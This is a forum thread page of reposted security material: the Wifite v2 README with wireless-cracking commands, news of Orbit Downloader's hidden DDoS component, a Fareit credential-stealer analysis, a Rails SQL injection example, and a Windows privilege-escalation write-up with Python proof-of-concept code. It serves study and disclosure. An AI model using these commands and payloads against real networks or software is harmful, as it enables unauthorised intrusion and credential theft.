    Wifite v2 is now available What's new in this version: support for cracking WPS-encrypted networks (via reaver) 2 new WEP attacks more accurate WPA handshake capture various bug fixes Version 2 does not include a GUI, so everything must be done at the command-line. mention in the New York Times Wifite was mentioned in the New York Times' article "New Hacking Tools Pose Bigger Threats to Wi-Fi Users" from February 16, 2011. Here is a link to the article. introduction Designed and tested on Linux; works with Backtrack 5, BlackBuntu, BackBox, and Pentoo! Linux only; no windows or OSX support (but you're welcome to try). purpose To attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the "set it and forget it" wireless auditing tool. features sorts targets by signal strength (in dB); cracks closest access points first automatically de-authenticates clients of hidden networks to reveal SSIDs numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) customizable settings (timeouts, packets/sec, etc) "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete all captured WPA handshakes are backed up to wifite.py's current directory smart WPA de-authentication; cycles between all clients and broadcast deauths stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit displays session summary at exit; shows any cracked keys all passwords saved to cracked.txt built-in updater: ./wifite.py -upgrade requirements linux operating system (confirmed working on Backtrack 5, BackBox, BlackBuntu, Pentoo, Ubuntu 8.10 (BT4R1), Ubuntu 10.04, Debian 6, Fedora 16) tested working with python 2.6.x, and python 2.7.x, wireless drivers patched for monitor mode and injection. Most security distributions (Backtrack, BlackBuntu, etc) come with wireless drivers pre-patched, aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or at the aircrack-ng website, suggested applications reaver, for attacking WPS-encrypted networks pyrit, cowpatty, tshark: not required, but help verify WPA handshake captures For help installing any of these programs, see the installation guide (hosted on github) execution download the latest version: wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.pychange permissions to executable: chmod +x wifite.pyexecute: python wifite.pyor, to see a list of commands with info: ./wifite.py -helpscreenshots video tutorial (tutorial is for v1 of wifite. new videos coming soon) capturing WPA handshake using Wifite (and then cracking with oclHashCat). video credit: Maurizio Schmidt examples the program contains lots of interactivity (waits for user input). these command-line options are meant to make the program 100% automated -- no supervision required. to crack all WEP access points: ./wifite.py -all -wepto crack all WPS access points with signal strength greater than (or equal to) 50dB: ./wifite.py -p 50 -wpsto attack all access points, use 'darkc0de.lst' for cracking WPA handshakes: ./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lstto attack all WPA access points, but do not try to crack -- any captured handshakes are saved automatically: ./wifite.py -all -wpa --dict noneto crack all WEP access points greater than 50dB in strength, giving 5 minutes for each WEP attack method, and send packets at 600 packets/sec: ./wifite.py --pow 50 -wept 300 -pps 600to attempt to crack WEP-encrypted access point "2WIRE752" endlessly -- program will not stop until key is cracked or user interrrupts with ctrl+C): ./wifite.py -e "2WIRE752" -wept 0 donations If you wish to donate to this project, I ask that you donate instead to the aircrack-ng team or you could buy something from Tactical Network Solutions. These are the teams which produced the awesome open-source software that wifite depends on. Wifite would not exist if not for these amazing tools. Sursa: wifite - automated wireless auditor - Google Project Hosting
  17. Nytro
    Poate fi foarte util, pacat ca se incarca asa greu...
  18. Nytro
    Atat! Mirror, toate: https://rstforums.com/fisiere/blackhat.zip
  19. Nytro
    [h=1]Popular download management program has hidden DDoS component, researchers say[/h][h=2]Orbit Downloader's DDoS component is used to attack websites and can cause Internet connection problems for users[/h][h=3]By Lucian Constantin[/h] August 22, 2013 — IDG News Service — Recent versions of Orbit Downloader, a popular Windows program for downloading embedded media content and other types of files from websites, turns computers into bots and uses them to launch distributed denial-of-service (DDoS) attacks, according to security researchers. Starting with version 4.1.1.14 released in December, the Orbit Downloader program silently downloads and uses a DLL (Dynamic Link Library) component that has DDoS functionality, malware researchers from antivirus vendor ESET said Wednesday in a blog post. The rogue component is downloaded from a location on the program's official website, orbitdownloader.com, the ESET researchers said. An encrypted configuration file containing a list of websites and IP (Internet Protocol) addresses to serve as targets for attacks is downloaded from the same site, they said. Orbit Downloader has been developed since at least 2006 and judging by download statistics from software distribution sites like CNET's Download.com and Softpedia.com it is, or used to be, a popular program. Orbit Downloader was downloaded almost 36 million times from Download.com to date and around 12,500 times last week. Its latest version is 4.1.1.18 and was released in May. In a review of the program, a CNET editor noted that it installs additional "junk programs" and suggested alternatives to users who need a dedicated download management application. When they discovered the DDoS component, the ESET researchers were actually investigating the "junk programs" installed by Orbit Downloader in order to determine if the program should be flagged as a "potentially unwanted application," known in the industry as PUA. "The developer [of Orbit Downloader], Innoshock, generates its revenue from bundled offers, such as OpenCandy, which is used to install third-party software as well as to display advertisements," the researchers said, noting that such advertising arrangements are normal behavior for free programs these days. "What is unusual, though, is to see a popular utility containing additional code for performing Denial of Service (DoS) attacks," they said. The rogue Orbit Downloader DDoS component is now detected by ESET products as a Trojan program called Win32/DDoS.Orbiter.A. It is capable of launching several types of attacks, the researchers said. First, it checks if a utility called WinPcap is installed on the computer. This is a legitimate third-party utility that provides low-level network functionality, including sending and capturing network packets. It is not bundled with Orbit Downloader, but can be installed on computers by other applications that need it. If WinPcap is installed, Orbit's DDoS component uses the tool to send TCP SYN packets on port 80 (HTTP) to the IP addresses specified in its configuration file. "This kind of attack is known as a SYN flood," the ESET researchers said. Articol complet: http://ht.ly/ocw3t
  20. Nytro
    [h=1]Using the Intel® C++ Compiler with Microsoft* Visual Studio 2012*[/h] https://www.youtube.com/watch?v=Lk1IjgVg1ss&feature=youtu.be Publicat la 22.08.2013 This video demonstrates how to use Intel® C++ Compiler within Microsoft* Visual Studio 2012*
  21. Nytro
    Your Guide for Migrating from 1024-bit to stronger SSL certificate key lengths Managing certificates during a time of key size migration can be difficult. Website or production outages can be costly and have a negative impact to business. This guide aims to help educate and inform users of TLS/SSL certificates about the upcoming change in key lengths and tips on managing their transition to using stronger SSL certificates. Download: http://csmres.co.uk/cs.public.upd/article-downloads/Your-Guide-To-Migrating-From-1024Bit-SSL.PDF
  22. Nytro
    Context Information Security Research. Response. Assurance www.contextis.com White paper Pixel Perfect Timing Attacks with HTML5 Paul Stone whitepapers @contextis.co.uk July 2013 Contents Abstract Thinking in Frames using requestAnimationFrame to time browser operations requestAnimationFrame and Timing Attacks Rendering Links and Redraw Events Detecting Redraw Events Calibration Results and Practicality Visibility Speed Reliability CSS, SVG and Filters Timing Attacks with SVG Filters Timing the speed of SVG filters History Sniffing with SVG Filters Reading Pixels Reading Text with Pixel Perfect OCR Conclusion Security Bug Reports and Disclosure About Context Works Cited Download: http://contextis.co.uk/files/Browser_Timing_Attacks.pdf
  23. Nytro
    “Bank of America” Malware: An In-Depth Analysis Posted by ThreatTrack Security Labs On August 20, 2013 Editor’s Note: Reginald Wong is a Heuristic Detection Supervisor in one of ThreatTrack Security’s research labs. He has been in the security industry for more than a decade. Bank of America remains one of the largest and most well-known name in banking in the Americas. It has also remained one of the brands most used by spammers and phishers, along with Wells Fargo, JP Morgan Chase and Citi Bank. Year after year, spammers and phishers have been practicing the same method of luring unknowing recipients into opening their malicious attachments—therefore, successfully infecting their computers if their devices were not properly secured—or giving out essential information about themselves like user names and passwords. We see BoA spam in our Inbox or Spam mail folders every once in a while, whether we’re actual clients of the said bank or not. But have you ever been curious as to what a BoA malware looks like on the inside? Or what this malware would actually do on your system if you have fallen for the spam’s claims and opened the file? To answer these questions, and perhaps more, we fished out one of the latest spam samples we have in our honeypots to dissect its malicious attachment. Overview: Spam and Attachment This particular fake BoA mail that is spammed in the wild pretends to notify recipients that the sender has sent them instructions on how to create a password to open the bank’s supposed “secure e-mail”. From: Marion.Palmer To: {random} Subject: Instructions Secured E-mail.pdf Message body: I will forward the application through a secure e-mail. Attached are instructions for you to create a password to open the secure e-mail from us. Just a bit of security for when we transmit confidential information. Thanks, Marion.Palmer Bank of America Principal Business Relationship Manager Direct – 915-163-8526 office Cell – 915-092-0252 cell Marrion(dot)Palmer@bankofamerica(dot)com {disclaimer} The attachment is a ZIP-compressed file with the name Secured E-mail.zip, which actually contains the executable (.EXE) file, Instructions Secured E-mail.exe, which has the icon of a legitimate Adobe PDF file. Notable details about this file show no program name nor company name. Legitimate files usually have these basic information. Now Comes the Technical Part Once users open the fake PDF file, naturally executing the malware, it begins to decrypt a couple of data into newly allocated memory spaces that contain codes that dynamically imports API for use in its later process. This initially results to these APIs: Let me just mention that notable bugs can be seen when attempting to import more APIs. Simple string decryption is also incomplete. Anyway, embedded into the file is an encrypted PE file (93,696 Bytes). It allocates memory space for this file and decrypts it there. It then replaces the entire running malware with this new PE file by copying data (such as the below list) from it section by section: Use VirtualProtect API to replace memory protection with WRITE access. Copy binary codes and data of the section based on the virtual size indicated in the PE section headers. Restore the memory protection. It then dynamically imports the APIs indicated in the new PE’s import section table, which results to the following APIs: Since the running process has been replaced by a new PE files, some information in its Process Environment Block, such as the entry point and the image base, are changed. Finally, it returns back to the modified process, starting at the entry point. Still Fareit We did a simple binary comparison and have determined that this malicious attachment is a variant of the Fareit malware, a family of Trojan information stealers. After further digging, we have unearthed other facts about this variant: Copies and possible updates of itself can be downloaded from the following URLs: Stolen information are sent to / Updates are received from the following server sites: It uses the following list of passwords to force itself into accounts: It steals stored credentials from different applications, mostly from FTP clients. Below are its list of targets: Common System Information FAR/FAR2/FAR3 built-in ftp client Windows/Total Commander built-in ftp client Ipswitch WS_FTP client CuteFTP FlashFXP FileZilla FTP Commander BulletProof FTP SmartFTP 2.x-4.x TurboFTP FFFTP CoffeeCupFTP CoreFTP FTP Explorer Frigate3 FTP SecureFX 6.6 UltraFXP 1.7 FTPRush 2.1.4, 2.1.5 WebSitePublisher 2.1.5 BitKinex 3.2.3 ExpanDrive 1.8.4 ClassicFTP 2.14 Fling 2.23 SoftX 3.3 Directory Opus 9.5.6.0.3937 (64-bit) CoffeeCup FreeFTP 4.3 / DirectFTP LeapFTP 2.6.2.470, 3.1.0.50 WinSCP 4.3.2 (Build 1201) 32bit FTP 11.07.01 NetDrive 1.2.0.4 WebDrive 9.16 (build 2385) 64-bit FTP Control 4.5.0.0 Opera 6.x – 11.x WiseFTP 1.x – 7.x FTP Voyager 11.x-15.x Mozilla Firefox 0.x-5.x Mozilla Firefox FireFTP add-on Mozilla SeaMonkey 1.x-2.x Mozilla Flock 1.x-2.x Mozilla Suite Browser 1.x LeechFTP 1.3 Odin Secure FTP Expert WinFTP FTP Surfer 1.0.7 FTPGetter 3 ALFTP 5 IE 4-9 Dreamweaver CS5 DeluxeFTP 6 Google Chrome Chromium & SRWare Iron ChromePlus Bromium (Yandex Chrome) Nichrome Comodo Dragon RockMelt K-Meleon Epic StaffFTP AceFTP 3 Global Downloader FreshFTP BlazeFTP NetFile GoFTP 3D-FTP EasyFTP XFTP RDP (Windows Remote Desktop Connections) FTP Now Robo-FTP Certificate Grabber LinasFTP Cyberduck Putty (Russian version) Notepad++ (NppFTP plugin) CoffeeCup Visual Site Designer FTPShell FTPInfo NexusFile FastStone Browser CoolNovo WinZip (built-in FTP backup settings) Yandex.Internet MyFTP sherrod FTP NovaFTP Common Windows Mail decryption code Windows Live Mail Windows Mail Becky! Pocomail IncrediMail The Bat! Outlook Thunderbird FastTrackFTP Fareit has been around for two years now, and we have reason to believe that it continues to steal the same stored credentials from the above target applications. It is a sophisticated malware, and the criminals behind it have been making it sure that its variants remain behind scanners by constantly applying different techniques, like code obfuscation and encryption, to cover the real code beneath. This, in turn, also makes it quite a challenge for researchers to probe deeper. Reginald Wong Sursa: “Bank of America” Malware: An In-Depth Analysis
  24. Nytro
    Rails SQL Injection [h=2]Overview[/h] The Ruby on Rails web framework provides a library called ActiveRecord which provides an abstraction for accessing databases. This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input. Careless use of these methods can open up code to SQL Injection exploits. The examples here do not include SQL injection from known CVEs and are not vulnerabilites themselves, only potential misuses of the methods. Please use this list as a guide of what not to do. This list is in no way exhaustive or complete! Please feel free to contribute. [h=3]Examples[/h] Each method or option described below is accompanied by an example demonstrating how the ActiveRecord interface could be exploited if used unsafely. These are not necessarily the worst exploits, they represent just a small hint of what could be accomplished if one is not careful. The examples on this page were tested with Rails 3.2.13 and SQLite 3. [h=3]Interactive Version[/h] Clone and run this site from the git repo to try out or modify the examples! Documentation [h=3]Calculate Methods[/h] There are several methods based around ActiveRecord::Calculations#calculate. calculate takes an operation, a column name, and an options hash similar to ActiveRecord::FinderMethods#find. Methods based on calculate are shortcuts for different operations, and take a column name and options hash as arguments. In addition to the vulnerable options listed for find, the column name argument can also accept SQL! Calculation methods: average calculate count maximum minimum sum [h=4]Example[/h] This example finds the age of a specific user, rather than the sum of all user ages. params[:column] = "age) FROM users WHERE name = 'Bob';" Order.calculate(:sum, params[:column]) Query SELECT SUM(age) FROM users WHERE name = 'Bob' AS sum_id FROM "orders" Result 27 Articol complet: http://rails-sqli.org/
  25. Nytro
    Allowing low privileged users to create directories in C:\ Published 15/08/2013 | By MRL By default, Windows systems will allow low privileged users to create directories (but not files) in the root of the C: drive. In this post we ask if that’s really a security problem and ultimately conclude that, yes sometimes it can be. Default permissions Depending on the version of Windows, various low privileged users are allowed to create directories in C:\. On Windows 7, for example, Authenticated Users are: Or if you prefer the output of cacls, you can see this as the special permission “FILE_APPEND_DATA”: On Windows 2003, you see something similar, but for the Users group: (Don’t let the “FILE_WRITE_DATA” confuse you – that’s an “Inherit Only” permission). Potential security problems If we apply the principle of least privilege here, we’d probably conclude that normal users don’t really need to create directories in the root of the C: drive, so should not be allowed permissions to do so. But, in terms of specific security concerns, what’s the worst that could happen? Malicious users could stash their hacking tools or data they’ve stolen in a place other than their home directory. C:\backup probably wouldn’t raise suspicions. This is certainly possible, but perhaps not the most compelling security concern. What if the malicious user knew an automated installer would eventually install an application into C:\foo? Would the installer just fail? Or would it succeed, but leave the malicious user as the owner of the software directory? That’s not the subject of this post, but it sounds like a more concrete concern – but depends on predicting that a specific application will be installed. What if an application on the system searched for its support files in non-existent locations that the malicious user could create, e.g. C:\my-dev-dlls? This is the possibility that I want to explore in this post. Identifying programs accessing non-existent files I used procmon to show me all the processes where file access resulted in a “NOT FOUND” error. The green ticks show the simple filter I used: I opened up a few different programs to observe the various failed file access attempts and saw this one for C:\lib: (I’ve blacked out the name of the process – partly because it’s not relevant, and partly because I haven’t mentioned this to the vendor yet). So a malicious user on the system could create C:\lib. Then if the program attempts to read a file from there, the user could create that too. In this way, the malicious user could influence the execution of the program. The best case for an attacker is that program will load some sort of code (e.g. DLL or EXE) from the directory. Next best case is some sort of configuration file that could cause the application to misbehave. To determine what the program was searching for, I created C:\lib, then re-ran it. This time the program looked for C:\lib\SITE.PYC, C:\lib\OS.PY and C:\lib\OS.PY: So the program is looking for some python libraries! After some experimentation, I found I needed to create os.py and site.py, then the program would execute those files when it loaded. I create a simple PoC along the lines of [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]f = open('c:\lib\evil.txt', 'w') f.write('evil os.py was run') f.close() [/TD] [/TR] [/TABLE] So just before we attempt to exploit the program with our evil python scripts, the directory and permission look like this: After we launch the program, we can see it has run our evil payload: No PoC is really complete without running some actual OS commands. However, I found this slightly problematic. Normally I’d do the following: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]import os os.system("calc") [/TD] [/TR] [/TABLE] But in this case, we’ve replaced os.py, rendering “import os” somewhat useless. I considered a few workarounds including calling out to WinExec in kernel32.dll via ctypes – but I didn’t have ctypes available in this environment. Eventually I found the simplest route was to load the real os.py (which lives in in C:\python27\lib on my system): [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]import sys sys.path.insert(1, 'c:\python27\lib') #prepend import os os.system("whoami >> c:\lib\whoami-site.txt") [/TD] [/TR] [/TABLE] Note that we prepend to the PYTHONPATH in order to look for os.py in the correct location first. This correctly runs whoami.exe and logs the output of who ran the program to a file. In this way our evil payload records all the unwitting users we could have run OS commands in the context of. Conclusion We’ve shown how a pretty low-tech approach to bug hunting could uncover a vulnerability that is made exploitable by the default file permissions on C:\. This could allow a malicious user on a terminal server (say) to cause other users to run code of their choosing. A simple privilege escalation attack – at the very least a horizontal privilege escalation. The vulnerability could be caused by the way the application is coded or by a locally configured search path in the application’s environment. In this case, the principle of least privilege would have saved the day. Sursa: Allowing low privileged users to create directories in C: | Portcullis Labs
×
×
  • Create New...